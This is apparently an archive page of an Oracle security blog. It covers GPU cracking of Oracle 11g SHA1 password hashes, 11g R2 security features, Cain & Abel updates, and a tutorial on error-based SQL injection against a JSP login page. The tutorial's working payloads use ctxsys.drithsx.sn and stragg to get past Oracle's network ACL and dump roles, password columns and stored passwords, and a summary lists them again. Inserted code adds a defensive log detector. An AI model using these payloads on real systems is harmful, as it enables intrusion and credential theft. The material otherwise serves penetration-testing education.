Archive of the 11g category

IGHASHGPU - Cracking Oracle Passwords with 790 Million Passwords/second

This time I want to present a new super-fast password cracker. Ivan Golubev released a new version of his password cracker IGhashGPU. I have known the tool for a while, but in older versions of IGHASHGPU Oracle SHA1 passwords were not supported.

The new version 0.62 now also supports Oracle 11g hashes (SHA1 + salt). The remarkable thing is the speed of cracking passwords. Ivan's cracker uses the GPU for cracking the passwords. Without a GPU (NVidia or ATI) or within a virtual machine the tool does not work.

On a dual ATI 5970 configuration (forum entry) the tool can crack approx. 790 (!!!) million hashes per second. A single ATI 4850 can achieve more than 300 million hashes per second. This means that the new 11g password algorithm can be cracked approx. 130 times faster than the old DES algorithm. I am not sure if it was a good idea of Oracle to use such a standard algorithm as SHA1, because together with MD5 it is one of the most optimized algorithms.

Here is a short comparison between cracking old Oracle DES based passwords and new Oracle 11g SHA1 based passwords. I used the fastest software brute-force password crackers for Oracle DES (Repscan from Red-Database-Security or woraauthbf, both with approx. 6 million hashes per second on a Core i7) and compared them with IGHASHGPU running on a dual 5970 configuration (790 million hashes per second).

Here are some benchmark numbers. I know that 11g supports case sensitive passwords, but from my experience most people normally use lowercase passwords with the first character converted to uppercase. In such a case it is not necessary to crack the entire key space.

26 characters, length 6:   DES: 53 seconds,  SHA1: 0.4 seconds
26 characters, length 7:   DES: 23 min,      SHA1: 10 seconds
26 characters, length 8:   DES: 10 h,        SHA1: 4.6 minutes
26 characters, length 9:   DES: 11 days,     SHA1: 2 hours
26 characters, length 10:  DES: 283 days,    SHA1: 2 days

If you are interested in downloading the tool, you can get it from here.
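To show where the table above comes from, here is an added example (not from the original post) that recomputes the exhaustive-search times from the two rates quoted in the post and turns the same arithmetic into a defender's question: how long must a password be so that a GPU-rate attacker cannot exhaust the keyspace within an assumed 90-day rotation interval? The rates, the 90-day budget and the 62-character alphabet are assumptions.

```python
DES_RATE = 6_000_000        # hashes/s, CPU brute force on a Core i7 (rate taken from the post)
SHA1_RATE = 790_000_000     # hashes/s, IGHASHGPU on a dual ATI 5970 (rate taken from the post)


def keyspace(alphabet_size, length):
    """Number of candidate passwords of exactly `length` characters."""
    return alphabet_size ** length


def exhaustive_seconds(alphabet_size, length, rate):
    """Worst-case seconds to try every candidate at `rate` hashes per second."""
    return keyspace(alphabet_size, length) / rate


def human(seconds):
    """Render a duration in the largest fitting unit, one decimal place."""
    for unit, size in (("days", 86400), ("h", 3600), ("min", 60)):
        if seconds >= size:
            return f"{seconds / size:.1f} {unit}"
    return f"{seconds:.1f} s"


def comparison_table(alphabet_size=26, lengths=range(6, 11)):
    """Recompute the DES-vs-SHA1 table from the post for lowercase-only passwords."""
    return [(n, human(exhaustive_seconds(alphabet_size, n, DES_RATE)),
             human(exhaustive_seconds(alphabet_size, n, SHA1_RATE))) for n in lengths]


def min_length_for(alphabet_size, rate, budget_seconds):
    """Smallest password length whose full keyspace outlasts `budget_seconds` at `rate`.

    Defender's use: choose the policy minimum so that an attacker at GPU speed
    cannot exhaust the space before the password is rotated (assumed budget).
    """
    length = 1
    while exhaustive_seconds(alphabet_size, length, rate) <= budget_seconds:
        length += 1
    return length


if __name__ == "__main__":
    for n, des, sha1 in comparison_table():
        print(f"26 characters, length {n:2d}:  DES {des:>10}   SHA1 {sha1:>10}")
    budget = 90 * 86400  # assumed 90-day rotation interval
    print("lowercase only, GPU rate:", min_length_for(26, SHA1_RATE, budget), "characters")
    print("mixed case + digits (62), GPU rate:", min_length_for(62, SHA1_RATE, budget), "characters")
```

The small differences from the post's table come from rounding of the quoted rates; the point is the ratio between the two columns, which stays at roughly 130.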

New Security Features Oracle 11g Release 2

Here are the new security features of Oracle 11g Release 2.

  • Enhancements to the Audit Trail Cleanup Process
    (Oracle has added several enhancements to the audit trail cleanup process, e.g. setting a maximum size and age for OS audit trails, moving the audit trail out of the SYSTEM tablespace, purging audit trail records in one operation or via a purge job, and timestamping audit trail records based on their archive date)
  • Enhancements to Directory Objects
    (Execute privilege for directory objects. Since Oracle 11.1.0./10.2.0.5 it is possible to run OS commands via external tables. This privilege allows restricting the execution of OS commands.
    Auditing of directory objects: "AUDIT EXECUTE ON DIRECTORY rds_dir BY ACCESS;")
  • Enhancements to Fine-Grained Access to External Network Services
    (utl_http supports the Amazon Simple Storage Service (S3) scheme,
    support for IPv6)
  • Global Application Contexts Available Across Oracle RAC Instances
  • Secure Sockets Layer (SSL) Version 2 Support Change
    (SSL version 2 is no longer included in the default list of supported protocols)
  • Tablespace Master Key Rekey: Changing the Encryption Key Password
    (To fulfil the PCI DSS requirements it is now possible to rotate the encryption key)

Some features are deprecated in this version of Oracle:

  • DB_EXTENDED Setting for the AUDIT_TRAIL Parameter Deprecated
    (use the DB,EXTENDED string instead)
  • WKUSER Role and Ultra Search Schemas Deprecated
    (The WKUSER role and the schemas WKSYS, WKTEST, WKPROXY have been deprecated)
  • Database Configuration Assistant No Longer Provides Default Security Settings
    (Audit options and password policies are automatically added to the database if you use DBCA)
  • ALTER USER Clause AUTHENTICATED USING PASSWORD Deprecated
    (btw, "IDENTIFIED BY VALUES" is still undocumented, see the Oracle documentation)
  • Password for the listener.ora File Deprecated
    (According to Oracle it is no longer needed and will be removed in Oracle 12)

Tutorial: Oracle SQL Injection in Webapps - Part I

This blog entry will show a SQL Injection example based on a JSP application (thanks to Slavik) and Oracle 11.1.0.7. An Oracle SQL Injection Cheat Sheet is available on our webpage.

With Oracle 11g, Oracle introduced some security enhancements by default, e.g. the ACL for PL/SQL packages accessing the network. These packages are UTL_HTTP, UTL_INADDR, UTL_TCP, ... Some old, well-known tricks like the usage of utl_inaddr no longer work for non-DBAs in 11g. The following tutorial will show how to bypass these restrictions and will show some new tricks.

First we start with a vulnerable webapp:

Oracle SQL Injection Picture 1

In this webapp we can log in to an employee directory. If we try to guess a valid combination, e.g. scott / tiger, we get an error message.

Oracle SQL Injection

OK, let's try to use a single quote ' as the user login. And BANG - ERROR

Oracle SQL Injection Picture 3

“ORA-01756 - Anführungsstrich fehlt bei Zeichenfolge”.

If you do not speak German, you can look up the English translation of this error message on Google. It is not uncommon to receive an error message in a foreign language (if you work internationally).

There are several websites, so I take the first hit. The translation is "ORA-01756: quoted string not properly terminated". This is a common error message of a SQL Injection vulnerability.

A typical SQL Injection string is

' or 1=1--

If we use this string, we get the following result:

Oracle SQL Injection Picture 4

By using ' or 1=1-- we successfully logged into the system. But we are interested in the data, not in the account of the webapp.

Oracle SQL Injection Picture 5

We are able to inject our own code. This page does not return data from the database so the usage of UNION SELECT is not an option.

But what are the next steps?

1. Enumeration of the database:
Let’s find out the version number of the Oracle database:

Now we try to inject the following command in the login field

' or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--

Oracle SQL Injection Picture 6

Again an ORA-01756 error. This time it is a different problem: the login field is limited to 50 characters, but the string we are injecting is longer. That's why we convert the POST into a GET.
The Web Developer plugin for Firefox can do this (+ many other things like saving the webpage locally, removing restrictions online, ...).

After converting the POST into a GET we can modify the injected string in the URL:

Oracle SQL Injection Picture 8

Again we get a German error message:
ORA-24247 Netzwerkzugriff von Access Control List (ACL) abgelehnt.

A quick lookup shows the English translation:

ORA-24247  network access denied by access control list (ACL)

OK, the default hardening from Oracle is working. We are not able to send information via DNS or create a specially crafted error message using utl_inaddr.

I was looking for an alternative and found the following function:
ctxsys.drithsx.sn

So we replace utl_inaddr with ctxsys.drithsx.sn (plus one additional parameter).

Our new injection looks like:

' or 1=ctxsys.drithsx.sn(1,(select banner from v$version where rownum=1))--

After injecting this we get the following error message:

Oracle SQL Injection Picture 9

ORA-20000: Oracle Text-Fehler
DRG-11701: Thesaurus Oracle Database 11g Enterprise Edition Release 11.1.0.7.0 - Production ist nicht vorhanden

The error message contains the database version. The reason for this behaviour is that our injected string includes the result of the query (select banner from v$version where rownum=1) in the error message. This query returns the first row of v$version.

Injecting error messages is normally limited to 1 column and 1 row. The limitation of 1 column can be bypassed using string concatenation || (col1||col2). To bypass the limitation to a single row, most pentesters iterate over the rows using rownum.

But Oracle 11g offers a new function: stragg

This function can convert multiple rows into a single row. In one of the next tutorials I will show how to do this in Oracle 9 and 10. We can now use the function stragg to get all rows in the error message:

' or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct banner)||' ' from v$version))--

Oracle SQL Injection Picture 9a

Now we have everything to retrieve all data (according to our privileges) from the database.

Let's see what privileges we have:

' or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct granted_role||';') from user_role_privs))--

Oracle SQL Injection Picture 10

We have the CONNECT and RESOURCE roles.

The next step is to get all tables with a password column:

' or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct owner||'.'||table_name||'['||data_type||'];') from all_tab_columns where column_name='PASSWORD'))--

Oracle SQL Injection Picture 11

There is a table called SHOP.SHOPUSER. We now use the following command to extract all passwords from this table:

' or 1=ctxsys.drithsx.sn(1,(select sys.stragg(distinct password||';') from shop.shopuser))--

Oracle SQL Injection Picture 12

Using this approach we can retrieve the entire table content without using UNION SELECT.

SUMMARY of the injected commands used:

' or 1=utl_inaddr.get_host_address((select banner from v$version where rownum=1))--

' or 1=utl_inaddr.get_host_address((select sys.stragg(distinct granted_role||';') from user_role_privs))--

' or 1=utl_inaddr.get_host_address((select sys.stragg(distinct owner||'.'||table_name||'['||data_type||'];') from all_tab_columns where column_name='PASSWORD'))--

' or 1=utl_inaddr.get_host_address((select sys.stragg(distinct password||';') from shop.shopuser))--
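As an added example (not part of the original tutorial), here is a defender-side detector for the injected strings above: after the POST-to-GET conversion they end up in the query string, so they are visible in web-server access logs. The log lines, the login.jsp path and the field name "login" are constructed for this example; the Oracle identifiers are the ones the tutorial uses. A second check flags responses that leak raw ORA-/DRG- error text, which error-based injection depends on.

```python
import re
from urllib.parse import parse_qs, urlparse

# Oracle objects a login form has no business referencing; every one of them is
# used above either to carry data out via an error message or to aggregate rows.
SUSPICIOUS_OBJECTS = ("utl_inaddr", r"ctxsys\.drithsx\.sn", "stragg", r"v\$version",
                      "all_tab_columns", "user_role_privs")
OBJECT_RE = re.compile("|".join(SUSPICIOUS_OBJECTS), re.IGNORECASE)
# a quote that closes the string literal, a boolean operator, and the -- terminator
BREAKOUT_RE = re.compile(r"'\s*(?:or|and)\b.*--", re.IGNORECASE | re.DOTALL)
# request line and status of a combined-format access log entry
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')
ORA_ERROR_RE = re.compile(r"\b(?:ORA|DRG)-\d{5}\b")


def inspect_query(url):
    """Return the reasons why the query string of `url` looks like Oracle SQL injection."""
    reasons = []
    for name, values in parse_qs(urlparse(url).query, keep_blank_values=True).items():
        for value in values:  # parse_qs already percent-decodes and turns '+' into spaces
            if BREAKOUT_RE.search(value):
                reasons.append(f"{name}: quote breakout ending in a -- comment")
            for hit in OBJECT_RE.findall(value):
                reasons.append(f"{name}: references {hit.lower()}")
    return reasons


def scan_access_log(lines):
    """Return (line number, HTTP status, reasons) for every suspicious request."""
    findings = []
    for number, line in enumerate(lines, 1):
        match = REQUEST_RE.search(line)
        if match:
            reasons = inspect_query(match.group(1))
            if reasons:
                findings.append((number, int(match.group(2)), reasons))
    return findings


def leaks_oracle_error(response_body):
    """True if a response exposes raw ORA-/DRG- text instead of a generic error page."""
    return ORA_ERROR_RE.search(response_body) is not None


# constructed sample: one legitimate login, then the first two injections from the
# tutorial, URL-encoded as a browser sends them after the POST-to-GET conversion
SAMPLE_LOG = [
    '192.0.2.10 - - [20/May/2012:10:00:01 +0200] "GET /login.jsp?login=scott&password=tiger HTTP/1.1" 200 512',
    '192.0.2.10 - - [20/May/2012:10:00:09 +0200] "GET /login.jsp?login=%27+or+1%3D1--&password=x HTTP/1.1" 200 2048',
    '192.0.2.10 - - [20/May/2012:10:00:31 +0200] "GET /login.jsp?login=%27+or+1%3Dctxsys.drithsx.sn(1,(select+banner+from+v%24version+where+rownum%3D1))--&password=x HTTP/1.1" 500 731',
]
```

Run `scan_access_log(SAMPLE_LOG)` to get the flagged lines; the HTTP 500 on the third one is the server relaying the ORA-20000/DRG-11701 text, which is what a generic error page would have hidden.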

New version of Cain with support for 11g passwords

2 weeks ago, Massimiliano Montoro aka Mao, released a new version of Cain & Abel.

Here are some of the new features of Cain & Abel v4.9.25:

- Oracle 11g (case sensitive) Password Extractor via ODBC.
- Added Oracle 11g Password Cracker (Dictionary and Brute-Force Attacks).
- Added support for Oracle TNS 11g (AES-192) in Oracle TNS Hashes Password Cracker.
- Added support for Oracle TNS 11g (AES-192) in Oracle TNS sniffer filter.
- Experimental SQL Query tool via ODBC.

Cain Screenshot

The AES implementation of Cain is slower than the implementation of GSAuditor (6,172,839 vs 2,654,719 on a 2.4 GHz C2D E4600), but 2.6 million passwords per second (via brute force) is still quite fast.

Massimiliano also wrote 3 interesting whitepapers about the TNS authentication based on László Tóth's work. Instead of using oran10.dll/oran11.dll, Mao uses the OpenSSL library:

Oracle 9i TNS 3DES authentication details
Oracle 10g TNS AES-128 authentication details
Oracle 11g TNS AES-192 authentication details

Looking Glass and Oracle 11g

Yesterday I read an article about Apple Quicktime and LookingGlass. I downloaded the free tool from the website of errata security.

Here are the results of a test with Oracle 11.1.0.6 on Windows. I scanned the Oracle Home and the tool found 518 Oracle files with dangerous functions like strcpy, sprintf, sscanf, strcat, ...

Output Looking Glass

The Oracle executable (oracle.exe), for example, uses wsprintfA, strncpy, sprintf, sscanf, _vsnprintf, _snprintf, vprintf, strncat, strtok, strlen, strcpy and strcat.